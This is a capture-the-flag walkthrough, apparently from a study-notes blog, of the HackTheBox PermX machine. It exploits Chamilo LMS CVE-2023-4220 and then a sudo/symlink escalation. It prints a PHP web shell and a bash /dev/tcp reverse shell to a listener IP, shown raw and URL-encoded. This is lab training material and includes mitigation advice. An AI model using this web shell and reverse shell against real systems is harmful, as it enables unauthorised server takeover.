Introduction

In HackTheBox PermX, we explore the Permx machine from Hack The Box (HTB), focusing on exploiting the Chamilo LMS vulnerability identified as CVE-2023-4220

OSCP Study Notes

HackTheBox Certified Penetration Testing Specialist Study Notes

HackTheBox PermX Description

`PermX` is an Easy Difficulty Linux machine featuring a learning management system vulnerable to unrestricted file uploads via [CVE-2023-4220](https://nvd.nist.gov/vuln/detail/CVE-2023-4220). This vulnerability is leveraged to gain a foothold on the machine. Enumerating the machine reveals credentials that lead to SSH access. A `sudo` misconfiguration is then exploited to gain a `root` shell.

Enumeration

We begin by scanning the target machine using Nmap, which reveals open SSH and HTTP ports.

After adding permx.htb to the /etc/hosts file, we access the domain and discover a static website. By fuzzing virtual hosts, we identify two subdomains: www and lms.

The lms subdomain presents an admin login panel. Notably, the robots.txt file lists several routes, and the documentation section discloses the specific version of Chamilo in use.

Exploitation

Researching the identified Chamilo version leads us to CVE-2023-4220, which allows unauthenticated file uploads via the Big Upload feature.

CVE-2023-4220

CVE-2023-4220 is a critical security vulnerability identified in Chamilo LMS versions up to and including 1.11.24. This flaw allows unauthenticated attackers to upload malicious files via the ‘big file upload’ functionality, leading to potential remote code execution and stored cross-site scripting (XSS) attacks.

Technical Details:

The vulnerability stems from inadequate validation in the bigUpload.php script located at /main/inc/lib/javascript/bigupload/inc/bigUpload.php. Attackers can exploit this by uploading a web shell to the /main/inc/lib/javascript/bigupload/files/ directory, enabling unauthorized code execution on the server.

Impact:

Exploitation of this vulnerability can compromise the confidentiality, integrity, and availability of the affected system. The National Vulnerability Database (NVD) has assigned it a CVSS score of 8.1, categorizing it as a high-severity issue.

Mitigation:

To address this vulnerability, it is recommended to update Chamilo LMS to version 1.11.26 or later, where the issue has been resolved. Additionally, implementing strict input validation and access controls for file uploads can help prevent similar vulnerabilities.

References:

Shell

We attempt to exploit this vulnerability using an automated bash script alongside a PHP reverse shell. Although the shell uploads successfully, it fails to function as intended.

We then manually upload a simple PHP backdoor using the curl command and confirm its functionality by executing the id command.

<?php

// Check if a 'cmd' parameter exists in the request
if (isset($_REQUEST['cmd'])) {
    // Output formatted text
    echo "<pre>";

    // Retrieve the 'cmd' parameter from the request
    $cmd = $_REQUEST['cmd'];

    // Execute the system command provided in the 'cmd' parameter
    system($cmd);

    // Close the formatted text block
    echo "</pre>";

    // Stop further script execution
    die;
}

?>

Save the above php code as shell.php. Then we can use a netcat revser shell, URL-encode it and test it in the URL.

bash -c 'bash -i >& /dev/tcp/10.10.16.66/4444 0>&1'
# URL-encoded
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.66%2F4444%200%3E%261%27
# Inject it in the URL below
http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.66%2F4444%200%3E%261%27

To establish a reverse shell, we inject a payload that initiates a connection to our listener, achieving successful execution.

Privilege Escalation

After upgrading to an interactive TTY shell, we identify two users on the system.

We test the password found in the Chamilo configuration file with the mtz user, gaining access.

Checking the user’s sudo privileges reveals the ability to execute /opt/acl.sh without a password. This script modifies file permissions but restricts the target to the user’s home directory.

By creating a symbolic link to the /etc/sudoers file within the home directory and using the script to grant write permissions, we edit the sudoers file to provide the mtz user with all privileges.

This allows us to switch to the root user and complete the privilege escalation process.

You can also watch:

,
Show Comments

MasterMind Study Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles